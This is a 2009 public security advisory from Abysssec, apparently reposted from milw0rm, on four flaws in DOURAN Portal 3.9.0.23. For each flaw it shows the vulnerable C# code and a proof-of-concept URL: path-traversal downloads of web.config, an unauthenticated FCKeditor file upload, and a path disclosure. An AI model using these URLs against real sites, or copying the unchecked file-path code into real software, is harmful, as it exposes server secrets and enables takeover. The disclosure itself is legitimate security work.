Docstoc

DOURAN Portal 3.9.0.23 Multiple Remote Vulnerabilities

Document Sample
DOURAN Portal 3.9.0.23 Multiple Remote Vulnerabilities Powered By Docstoc
					                            DOURAN Portal 3.9.0.23 Multiple Remote Vulnerabilities                                   Page 1/3
  1    Abysssec Inc Public Advisory
  2
  3    Description :
  4
  5    these vulnerabilites found one year ago and new version of this portal "is not" affect whith these vulnerabilites any
       more
  6    but still lots of web site uses of old version and are vulnerable and also new version is not "fully secure" . so bec
       ause of patching there
  7    is no point to keep these private anymore these vulnerabities are just for educational purpose and author will be not
        be responsible
  8    for any damage using this vulnerabiltes .
  9
  10   Discovery : www.Abysssec.com
  11
  12   Title : Douran Portal Multiple Remote Vulnerabilities
  13   Affected Version : DOURAN Portal  <= V3.9.0.23
  14   Vendor Site    : www.douran.com
  15
  16
  17
  18   Vulnerabilites :
  19
  20
  21   1− File Download Vulnerbility in /Admin/ImportExport/download.aspx
  22
  23   Vulnerable Code :
  24
  25
  26                      string strFileName = Request.Params["Filename"];
  27                      if((strFileName != null) && (strFileName != ""))
  28                      {
  29                              string strPath = Server.MapPath("../../_DouranPortal/ExportPortal");
  30                              strPath += "\\" + strFileName; // Vulnerablity
  31                              if(System.IO.File.Exists(strPath))
  32                              {
  33                                      Response.Clear();
  34                                      Response.ContentType = "application/octet−stream";
  35                                      Response.AddHeader("Content−Transfer−Encoding", "binary");
  36                                      Response.AddHeader("Content−Disposition", "attachment; filename=\"" + strFileName + "
       \"");
  37                                      Response.Flush();
  38                                      Response.WriteFile(strPath);
  39                                      Response.End();
  40
  41                              .....
  42
  43
  44   PoC : http://www.vulnerable.com/Admin/ImportExport/Download.aspx?filename=../../web.config
  45
  46
  47
  48   2− File Download Vulnerbility in /download.aspx
Abysssec                                                                                                              05/18/2009
                           DOURAN Portal 3.9.0.23 Multiple Remote Vulnerabilities                                 Page 2/3
  49
  50   Vulnerable Code :
  51
  52
  53           string fileNameAttach = Request.Params["FileNameAttach"];
  54           string filePathAttach = Request.Params["FilePathAttach"];
  55           string originalAttachFileName = Request.Params["OriginalAttachFileName"];
  56           if((fileNameAttach != null) && (filePathAttach != ""))
  57           {
  58                   string strPath = Server.MapPath(filePathAttach + "/" + fileNameAttach); // Vulnerable
  59                   if(System.IO.File.Exists(strPath))
  60                   {
  61                           System.IO.Stream iStream = null;
  62
  63                             // Buffer to read 1 mega bytes in chunk:
  64                             int segmentLegthToRead = 1024 * 1024;
  65                             byte[] buffer = new Byte[segmentLegthToRead];
  66                    ......
  67
  68   PoC : http://www.vulnerable.com/download.aspx?FileNameAttach=/web.config
  69
  70   3− File Upload Vulnerability DesktopModules/fck/editor
  71
  72   Vulnerablity :
  73
  74   Using Fckeditor without any authentication will give ability to attacker to
  75   upload his / her own file and fckeditor won’t check file extention
  76   it will give ability to attacker upload a malicius server side ASP / ASPX / PHP   / JSP .
  77   so this vulnerability can creation access to server / portal completely .
  78
  79   PoC : http://www.vulnerable.com/DesktopModules/fck/editor/filemanager/upload/test.html
  80
  81
  82   4−Path Disclosure Vulnerablity In DesktopModules/DesktopCalendar/HZAN_pickercal.aspx
  83
  84   Vulnerable Code :
  85
  86   Calendar1.FullWidth = true;
  87           Calendar1.BigCaledar = bool.Parse((string)Request.QueryString["calsize"]);
  88           if (!IsPostBack)
  89           {
  90                   Calendar1.Date = new DateTime(long.Parse((string)Request.QueryString["curd"]));
  91                   Calendar1.CalendarCulture = (HZAN.Calendar.CultureType)Enum.Parse(typeof(HZAN.Calendar.CultureType),(
       string)Request.QueryString["culture"]);
  92                   seldate = Calendar1.Date.ToShortDateString();
  93                   ChangeSelDate1();
  94           }
  95
  96
  97   PoC : http://www.vulnerable.com/DesktopModules/DesktopCalendar/HZAN_pickercal.aspx?calsize=’
  98
  99

Abysssec                                                                                                           05/18/2009
                          DOURAN Portal 3.9.0.23 Multiple Remote Vulnerabilities                                    Page 3/3
  100   Final Note : for advanced security topics / sharing idea and etc ... please feel free to contact me at   : admin [at]
        abysssec.com
  101
  102   # milw0rm.com [2009−05−18]




Abysssec                                                                                                             05/18/2009

				
DOCUMENT INFO